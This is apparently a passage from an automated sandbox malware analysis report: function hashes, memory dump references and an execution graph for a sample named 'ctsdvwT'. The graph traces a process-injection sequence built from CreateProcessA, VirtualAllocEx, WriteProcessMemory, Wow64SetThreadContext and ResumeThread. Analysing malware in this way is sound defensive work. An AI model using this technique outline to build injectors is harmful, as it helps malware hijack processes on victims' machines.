                                            • Opcode Fuzzy Hash: 346bf83fed810d15ac8318789a18080f785a4fd62323ae99733e6c90048597ea
                                            • Instruction Fuzzy Hash: 4B21D8746101008BDB37676CE8CC33D3B69E746315F10486AE42AC7B85EB2ECE85CB42
                                            Function 01878D58 Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e4c286181aa37e0c655e6f1ffa168e7f609974e41049160251dd201cb2ec3f49
                                            • Instruction ID: a03bc6c57c4b7e41df4a20fcbe254b28456e75a395f8ed7e570ba730ca322252
                                            • Opcode Fuzzy Hash: e4c286181aa37e0c655e6f1ffa168e7f609974e41049160251dd201cb2ec3f49
                                            • Instruction Fuzzy Hash: 2D217471E1420A9BDB19CF68D89469EFBB6FF8A300F108619E805EB341DB71DD46CB91
                                            Function 01878C48 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 933f8725827f61b736f4650c2b10381d47a35b71d27350aab05bea7767919a2c
                                            • Instruction ID: 38d87fddecce76b8cb114daab430780a1047cc32529d796fd45bdcae4d81f30e
                                            • Opcode Fuzzy Hash: 933f8725827f61b736f4650c2b10381d47a35b71d27350aab05bea7767919a2c
                                            • Instruction Fuzzy Hash: DB213031E0060A9FDB19CFA8D4945DEBBB2AF8A304F24852AE815F7350DB71DA46CB51
                                            Function 0182D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258109077.000000000182D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0182D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_182d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 68cec36dc539483cb2dac1ca03c1daea908a3caece2db0297af6acd340dc94ea
                                            • Instruction ID: edf22b89486c6c223f005b2ce1c9d6455df3f47d4a8434567ebf5b09f6f81cbb
                                            • Opcode Fuzzy Hash: 68cec36dc539483cb2dac1ca03c1daea908a3caece2db0297af6acd340dc94ea
                                            • Instruction Fuzzy Hash: DE210371504244DFCB16DF68D580B16BF65EB84314F20C669D9098B2A6C33ED587CA61
                                            Function 01874F9A Relevance: .1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cfb2c4fd5cab61774ce9eae63121602596776583f8eb574d488da9998ef7f6fb
                                            • Instruction ID: 0e3918f279c8fabbd3fa9ee680136a0f42ac513f4c12f6f36e04def6999031eb
                                            • Opcode Fuzzy Hash: cfb2c4fd5cab61774ce9eae63121602596776583f8eb574d488da9998ef7f6fb
                                            • Instruction Fuzzy Hash: 82212734700205CFDB15DB78D599AADBBF1EB89704F1408A8E406EB3A5DB36EE01CB91
                                            Function 01871898 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: da59c4402c7e2a6ca5ebe9a89ff0d2df4e2dc5889803b811fbb592ed0351c7ce
                                            • Instruction ID: 7994e39fc8fff65e4eddd272c334304abd71d0b4cc32623f8762726816dbb756
                                            • Opcode Fuzzy Hash: da59c4402c7e2a6ca5ebe9a89ff0d2df4e2dc5889803b811fbb592ed0351c7ce
                                            • Instruction Fuzzy Hash: 49215C30B00209CFDB64DB68C5597AE77F6AB49344F600468D506EB790DF36CE01CBA1
                                            Function 01878C58 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b690c7f603fe8f883a0bd035ed244a0169af3c441fd96e169f6a147d84a6d764
                                            • Instruction ID: d09555da6833f7eed370c8165d5c7bbb653f3a848b239505827730abea5f5e7d
                                            • Opcode Fuzzy Hash: b690c7f603fe8f883a0bd035ed244a0169af3c441fd96e169f6a147d84a6d764
                                            • Instruction Fuzzy Hash: E5216230E0020A9BDB19CFA8C4545DEFBB2AF8A304F24851AE815F7350DB70DA45CB91
                                            Function 018716C0 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 514dbec7c4eaaa35c07b375db6bf38a421fffdb9156f6aa9c5ba6650180b6344
                                            • Instruction ID: 949c6d920cf557ad038fd5c43a251e1bf9592aff220a6f21e94de418210c9d8c
                                            • Opcode Fuzzy Hash: 514dbec7c4eaaa35c07b375db6bf38a421fffdb9156f6aa9c5ba6650180b6344
                                            • Instruction Fuzzy Hash: D92193746000014FDF66EB2CF888B2A775DEB4D344F109921D40AC766ADF3ADD458F91
                                            Function 01871888 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd8df25a4f9d6291d8326f941a7f8b2d3fd04aec42d48eb8f345ae9fb64b5aa8
                                            • Instruction ID: f2cb3a4c7f82bf47b248ecc42de4227572f832813a03fdbabd42650a661bb5cd
                                            • Opcode Fuzzy Hash: bd8df25a4f9d6291d8326f941a7f8b2d3fd04aec42d48eb8f345ae9fb64b5aa8
                                            • Instruction Fuzzy Hash: 03218930B00206CFDB65DB68C5597AEB7F2AB49344F6004A9D506EB7A0DF36DE05CBA1
                                            Function 01874FA8 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b26609bc9fec58b38cde4c8a554aeda30bbc32c23acbc4ad7d8b3807d98e7467
                                            • Instruction ID: 2f55b4d0c22abb870b8f4d44e14b9cde7d6b7e09bbd2c85f8cf7e034369cedce
                                            • Opcode Fuzzy Hash: b26609bc9fec58b38cde4c8a554aeda30bbc32c23acbc4ad7d8b3807d98e7467
                                            • Instruction Fuzzy Hash: 6721E634700205CFDB15DB78D559AAEBBF5AB89705F1408A8E406EB3A5DB36DE00CB91
                                            Function 018717D0 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 906a7feb05d88f93f6390bfc6b5addd596fded637f7a67078b9bf99b2fa0614f
                                            • Instruction ID: d094fca90629e1fb0e759f3e4bf57a2f2095cb8ecbe1b427429039c9ceb8cd1f
                                            • Opcode Fuzzy Hash: 906a7feb05d88f93f6390bfc6b5addd596fded637f7a67078b9bf99b2fa0614f
                                            • Instruction Fuzzy Hash: AD1126B6F012415FCB11AB78EC8C66E7BF9EB88340F148465E905C3745EB39C902C792
                                            Function 01871498 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 68eeb4d875c5e49555e79d8f2f5f16e2ceea5de4146e69e78bd8338dd14320e3
                                            • Instruction ID: 046e7a09cdd055b6a1e990c338c3560d2d1c601af926908582dca95a593bdc12
                                            • Opcode Fuzzy Hash: 68eeb4d875c5e49555e79d8f2f5f16e2ceea5de4146e69e78bd8338dd14320e3
                                            • Instruction Fuzzy Hash: 7311D372A003059FCB16EFBC84841AD7BF5AF16310B1800B9E805EB282E735CA418BA1
                                            Function 01870848 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0cbeda7dac35f5d9d4e09318155a2af13895ef6f1315baf623b0291859e97236
                                            • Instruction ID: 9d7377fb5d890351cccf965235051b9978fb5aaa910b899a54711aec4198ba1e
                                            • Opcode Fuzzy Hash: 0cbeda7dac35f5d9d4e09318155a2af13895ef6f1315baf623b0291859e97236
                                            • Instruction Fuzzy Hash: 08118F30B002088BDF655A7DD84476E7699EB4B324F204979F406CB362DA75CE858FD1
                                            Function 018714A8 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1b65d11d10dc74b7b1a7db61777d0b255e06dab7ffc962a42a48e9a315b1835
                                            • Instruction ID: d7799af8b43a37e00bf879ad72a3e6f7c6a35f09f678c74719fc08a12a4d37cf
                                            • Opcode Fuzzy Hash: e1b65d11d10dc74b7b1a7db61777d0b255e06dab7ffc962a42a48e9a315b1835
                                            • Instruction Fuzzy Hash: 90014071A003158FCB65EFBC84541ADBBF5EF49310B140479E90AF7681E635DA428BA2
                                            Function 0182D017 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258109077.000000000182D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0182D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_182d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: 4aa95f39c5b04fd6865ee37d1715774fcc3930c8cc0571d3a1adbc9ab94977c7
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: D311D075504280CFDB12CF54D5C4B15FF61FB44314F24C6A9D8498B666C33AD54BCB62
                                            Function 01879398 Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 986dcfcfc9358c6b8adee9b4f4eb55d04317def99bcc669ff9da1bc4b9147a12
                                            • Instruction ID: 3a1706b8839cef0237a51f5d0034a3bfed76f7433f2a349d267f8d2a5d507bb9
                                            • Opcode Fuzzy Hash: 986dcfcfc9358c6b8adee9b4f4eb55d04317def99bcc669ff9da1bc4b9147a12
                                            • Instruction Fuzzy Hash: 0A01B531A001058FDB04EF99E984B8ABBBAFF84320F548174D80C5B299DB74EA45C7A1
                                            Function 0187410F Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 38980a288288ddb14ee2fa669baee669a6860842933215a1f7fd59a62d50e691
                                            • Instruction ID: 0a8a2654ace13cb92f0cdd4386b012c8e8f357f7883d9a6dfdaaed995adc320c
                                            • Opcode Fuzzy Hash: 38980a288288ddb14ee2fa669baee669a6860842933215a1f7fd59a62d50e691
                                            • Instruction Fuzzy Hash: 4011C930E00609DFDF25FA98E9987ECB771AF75319F241529D011F2190EB348AC5CB26
                                            Function 01877BEA Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3086e038b259e02769096bf00a996aaa54029ef121b1251273709d38c9dba200
                                            • Instruction ID: e78a6695eb05d0e1e1f38b11bb63375f32dbf0c2f7849a28521c2dc51d5d559f
                                            • Opcode Fuzzy Hash: 3086e038b259e02769096bf00a996aaa54029ef121b1251273709d38c9dba200
                                            • Instruction Fuzzy Hash: 46017171900209AFCB45EFB8F944A9D7BB9EF48304F5041B4C4049B254DE3A5F098B81
                                            Function 01871534 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73d82ffb4ead45f088bfd1057afa1500703b8cdcf14adbfa4756b15da82be411
                                            • Instruction ID: 7b5565c3f4291f437dcc2be363f9a815e87614de38b84b2e0cce371b88e64a78
                                            • Opcode Fuzzy Hash: 73d82ffb4ead45f088bfd1057afa1500703b8cdcf14adbfa4756b15da82be411
                                            • Instruction Fuzzy Hash: 01F02473A04254CBDB26CBBC98941ACBFA1EF6931171C00E7E906EBA92D325D642CB51
                                            Function 01877BF8 Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f807b349616a025faeaf2a8f20d47d05f682fdff1e0066caf7d419bec2e0c35
                                            • Instruction ID: 786d4a07860cd5eadb275131cb235c2db13e5dd6216bdb50c10c4fc1c02c9ba3
                                            • Opcode Fuzzy Hash: 5f807b349616a025faeaf2a8f20d47d05f682fdff1e0066caf7d419bec2e0c35
                                            • Instruction Fuzzy Hash: 68F01271940109AFCB45EFB8F94499D7BB9EF48304F505574C40497254DE365F098B85

                                            Execution Graph

                                            Execution Coverage:10.6%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:146
                                            Total number of Limit Nodes:8
                                            execution_graph 22399 7a57f27 22401 7a57d5c 22399->22401 22400 7a58139 22401->22400 22405 7a592fe 22401->22405 22424 7a59298 22401->22424 22402 7a580b6 22406 7a5928c 22405->22406 22407 7a59301 22405->22407 22408 7a592ba 22406->22408 22442 7a597c7 22406->22442 22448 7a597da 22406->22448 22453 7a5979b 22406->22453 22459 7a596d8 22406->22459 22463 7a59979 22406->22463 22468 7a59c9e 22406->22468 22474 7a5995d 22406->22474 22480 7a5992a 22406->22480 22485 7a5984b 22406->22485 22490 7a59acb 22406->22490 22494 7a59d2b 22406->22494 22500 7a59baf 22406->22500 22505 7a5986c 22406->22505 22510 7a59b0c 22406->22510 22516 7a59aad 22406->22516 22408->22402 22425 7a592b2 22424->22425 22426 7a592ba 22425->22426 22427 7a597c7 2 API calls 22425->22427 22428 7a59aad 4 API calls 22425->22428 22429 7a59b0c 4 API calls 22425->22429 22430 7a5986c 2 API calls 22425->22430 22431 7a59baf 2 API calls 22425->22431 22432 7a59d2b 4 API calls 22425->22432 22433 7a59acb 2 API calls 22425->22433 22434 7a5984b 2 API calls 22425->22434 22435 7a5992a 2 API calls 22425->22435 22436 7a5995d 2 API calls 22425->22436 22437 7a59c9e 4 API calls 22425->22437 22438 7a59979 2 API calls 22425->22438 22439 7a596d8 2 API calls 22425->22439 22440 7a5979b 4 API calls 22425->22440 22441 7a597da 2 API calls 22425->22441 22426->22402 22427->22426 22428->22426 22429->22426 22430->22426 22431->22426 22432->22426 22433->22426 22434->22426 22435->22426 22436->22426 22437->22426 22438->22426 22439->22426 22440->22426 22441->22426 22443 7a597d4 22442->22443 22445 7a59730 22442->22445 22522 7a570e1 22443->22522 22526 7a570e8 22443->22526 22444 7a59c8b 22445->22408 22449 7a597e0 22448->22449 22530 7a576b0 22449->22530 22534 7a576b8 22449->22534 22450 7a59797 22450->22408 22454 7a597b4 22453->22454 22457 7a570e1 Wow64SetThreadContext 22454->22457 22458 7a570e8 Wow64SetThreadContext 22454->22458 22538 7a56c00 22454->22538 22542 7a56bf8 22454->22542 22457->22454 22458->22454 22546 7a57934 22459->22546 22550 7a57940 22459->22550 22464 7a59883 22463->22464 22465 7a59730 22464->22465 22554 7a575f1 22464->22554 22558 7a575f8 22464->22558 22465->22408 22469 7a599e7 22468->22469 22470 7a56c00 ResumeThread 22469->22470 22471 7a56bf8 ResumeThread 22469->22471 22472 7a570e1 Wow64SetThreadContext 22469->22472 22473 7a570e8 Wow64SetThreadContext 22469->22473 22470->22469 22471->22469 22472->22469 22473->22469 22475 7a597f1 22474->22475 22476 7a59cbe 22475->22476 22478 7a576b0 WriteProcessMemory 22475->22478 22479 7a576b8 WriteProcessMemory 22475->22479 22477 7a59797 22477->22408 22478->22477 22479->22477 22481 7a59883 22480->22481 22482 7a59730 22481->22482 22483 7a575f1 VirtualAllocEx 22481->22483 22484 7a575f8 VirtualAllocEx 22481->22484 22482->22408 22483->22481 22484->22481 22486 7a59854 22485->22486 22488 7a576b0 WriteProcessMemory 22486->22488 22489 7a576b8 WriteProcessMemory 22486->22489 22487 7a5990b 22487->22408 22488->22487 22489->22487 22491 7a59ad8 22490->22491 22562 7a577a1 22491->22562 22566 7a577a8 22491->22566 22495 7a599e7 22494->22495 22496 7a56c00 ResumeThread 22495->22496 22497 7a56bf8 ResumeThread 22495->22497 22498 7a570e1 Wow64SetThreadContext 22495->22498 22499 7a570e8 Wow64SetThreadContext 22495->22499 22496->22495 22497->22495 22498->22495 22499->22495 22501 7a59bd2 22500->22501 22503 7a576b0 WriteProcessMemory 22501->22503 22504 7a576b8 WriteProcessMemory 22501->22504 22502 7a5a099 22503->22502 22504->22502 22506 7a59872 22505->22506 22507 7a59730 22506->22507 22508 7a575f1 VirtualAllocEx 22506->22508 22509 7a575f8 VirtualAllocEx 22506->22509 22507->22408 22508->22506 22509->22506 22511 7a599e7 22510->22511 22512 7a56c00 ResumeThread 22511->22512 22513 7a56bf8 ResumeThread 22511->22513 22514 7a570e1 Wow64SetThreadContext 22511->22514 22515 7a570e8 Wow64SetThreadContext 22511->22515 22512->22511 22513->22511 22514->22511 22515->22511 22517 7a599e7 22516->22517 22518 7a56c00 ResumeThread 22517->22518 22519 7a56bf8 ResumeThread 22517->22519 22520 7a570e1 Wow64SetThreadContext 22517->22520 22521 7a570e8 Wow64SetThreadContext 22517->22521 22518->22517 22519->22517 22520->22517 22521->22517 22523 7a5712d Wow64SetThreadContext 22522->22523 22525 7a57175 22523->22525 22525->22444 22527 7a5712d Wow64SetThreadContext 22526->22527 22529 7a57175 22527->22529 22529->22444 22531 7a576b8 WriteProcessMemory 22530->22531 22533 7a57757 22531->22533 22533->22450 22535 7a57700 WriteProcessMemory 22534->22535 22537 7a57757 22535->22537 22537->22450 22539 7a56c40 ResumeThread 22538->22539 22541 7a56c71 22539->22541 22541->22454 22543 7a56c00 ResumeThread 22542->22543 22545 7a56c71 22543->22545 22545->22454 22547 7a579c9 CreateProcessA 22546->22547 22549 7a57b8b 22547->22549 22551 7a579c9 CreateProcessA 22550->22551 22553 7a57b8b 22551->22553 22555 7a57638 VirtualAllocEx 22554->22555 22557 7a57675 22555->22557 22557->22464 22559 7a57638 VirtualAllocEx 22558->22559 22561 7a57675 22559->22561 22561->22464 22563 7a577a8 ReadProcessMemory 22562->22563 22565 7a57837 22563->22565 22565->22491 22567 7a577f3 ReadProcessMemory 22566->22567 22569 7a57837 22567->22569 22569->22491 22570 7a5a560 22573 7a5a565 22570->22573 22571 7a5a6eb 22573->22571 22574 7a58e38 22573->22574 22575 7a5a7e0 PostMessageW 22574->22575 22576 7a5a84c 22575->22576 22576->22573 22577 13dd380 22578 13dd3c6 22577->22578 22582 13dd560 22578->22582 22585 13dd550 22578->22585 22579 13dd4b3 22589 13dafd4 22582->22589 22586 13dd560 22585->22586 22587 13dafd4 DuplicateHandle 22586->22587 22588 13dd58e 22587->22588 22588->22579 22590 13dd5c8 DuplicateHandle 22589->22590 22591 13dd58e 22590->22591 22591->22579

                                            Executed Functions

                                            Function 07A57934 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 327 7a57934-7a579d5 329 7a579d7-7a579e1 327->329 330 7a57a0e-7a57a2e 327->330 329->330 331 7a579e3-7a579e5 329->331 335 7a57a67-7a57a96 330->335 336 7a57a30-7a57a3a 330->336 333 7a579e7-7a579f1 331->333 334 7a57a08-7a57a0b 331->334 337 7a579f5-7a57a04 333->337 338 7a579f3 333->338 334->330 346 7a57acf-7a57b89 CreateProcessA 335->346 347 7a57a98-7a57aa2 335->347 336->335 339 7a57a3c-7a57a3e 336->339 337->337 340 7a57a06 337->340 338->337 341 7a57a61-7a57a64 339->341 342 7a57a40-7a57a4a 339->342 340->334 341->335 344 7a57a4c 342->344 345 7a57a4e-7a57a5d 342->345 344->345 345->345 348 7a57a5f 345->348 358 7a57b92-7a57c18 346->358 359 7a57b8b-7a57b91 346->359 347->346 349 7a57aa4-7a57aa6 347->349 348->341 351 7a57ac9-7a57acc 349->351 352 7a57aa8-7a57ab2 349->352 351->346 353 7a57ab4 352->353 354 7a57ab6-7a57ac5 352->354 353->354 354->354 355 7a57ac7 354->355 355->351 369 7a57c28-7a57c2c 358->369 370 7a57c1a-7a57c1e 358->370 359->358 372 7a57c3c-7a57c40 369->372 373 7a57c2e-7a57c32 369->373 370->369 371 7a57c20 370->371 371->369 375 7a57c50-7a57c54 372->375 376 7a57c42-7a57c46 372->376 373->372 374 7a57c34 373->374 374->372 378 7a57c66-7a57c6d 375->378 379 7a57c56-7a57c5c 375->379 376->375 377 7a57c48 376->377 377->375 380 7a57c84 378->380 381 7a57c6f-7a57c7e 378->381 379->378 383 7a57c85 380->383 381->380 383->383
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A57B76
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 5e3c9ae175d2c36204bdb0f3dc8e46e502add4433ecedbb1c606e771c92d9039
                                            • Instruction ID: f0dd42fa4e2ef657030a2f9d014f16f21d75ef910641fbc03633eaa9e78245c5
                                            • Opcode Fuzzy Hash: 5e3c9ae175d2c36204bdb0f3dc8e46e502add4433ecedbb1c606e771c92d9039
                                            • Instruction Fuzzy Hash: 2CA18FB1D0021ADFDB25CF68C840BEDBBB2BF44314F1485AAE819B7240DB759A85CF91
                                            Function 07A57940 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 384 7a57940-7a579d5 386 7a579d7-7a579e1 384->386 387 7a57a0e-7a57a2e 384->387 386->387 388 7a579e3-7a579e5 386->388 392 7a57a67-7a57a96 387->392 393 7a57a30-7a57a3a 387->393 390 7a579e7-7a579f1 388->390 391 7a57a08-7a57a0b 388->391 394 7a579f5-7a57a04 390->394 395 7a579f3 390->395 391->387 403 7a57acf-7a57b89 CreateProcessA 392->403 404 7a57a98-7a57aa2 392->404 393->392 396 7a57a3c-7a57a3e 393->396 394->394 397 7a57a06 394->397 395->394 398 7a57a61-7a57a64 396->398 399 7a57a40-7a57a4a 396->399 397->391 398->392 401 7a57a4c 399->401 402 7a57a4e-7a57a5d 399->402 401->402 402->402 405 7a57a5f 402->405 415 7a57b92-7a57c18 403->415 416 7a57b8b-7a57b91 403->416 404->403 406 7a57aa4-7a57aa6 404->406 405->398 408 7a57ac9-7a57acc 406->408 409 7a57aa8-7a57ab2 406->409 408->403 410 7a57ab4 409->410 411 7a57ab6-7a57ac5 409->411 410->411 411->411 412 7a57ac7 411->412 412->408 426 7a57c28-7a57c2c 415->426 427 7a57c1a-7a57c1e 415->427 416->415 429 7a57c3c-7a57c40 426->429 430 7a57c2e-7a57c32 426->430 427->426 428 7a57c20 427->428 428->426 432 7a57c50-7a57c54 429->432 433 7a57c42-7a57c46 429->433 430->429 431 7a57c34 430->431 431->429 435 7a57c66-7a57c6d 432->435 436 7a57c56-7a57c5c 432->436 433->432 434 7a57c48 433->434 434->432 437 7a57c84 435->437 438 7a57c6f-7a57c7e 435->438 436->435 440 7a57c85 437->440 438->437 440->440
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A57B76
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 515236c13fc0058d97b8c8b620e3041efa97027768a25f6e2c1e8c8bd7e8b7df
                                            • Instruction ID: 40f3c3a6dd8707d734e6a2c05dc7cf9f9a42149215b57763e08a63fdd988ab8c
                                            • Opcode Fuzzy Hash: 515236c13fc0058d97b8c8b620e3041efa97027768a25f6e2c1e8c8bd7e8b7df
                                            • Instruction Fuzzy Hash: F8917EB1D0021ADFDB25CF69C840BEDBBB2BF48314F1485A9E819B7240DB759A85CF91
                                            Function 013DB0E8 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
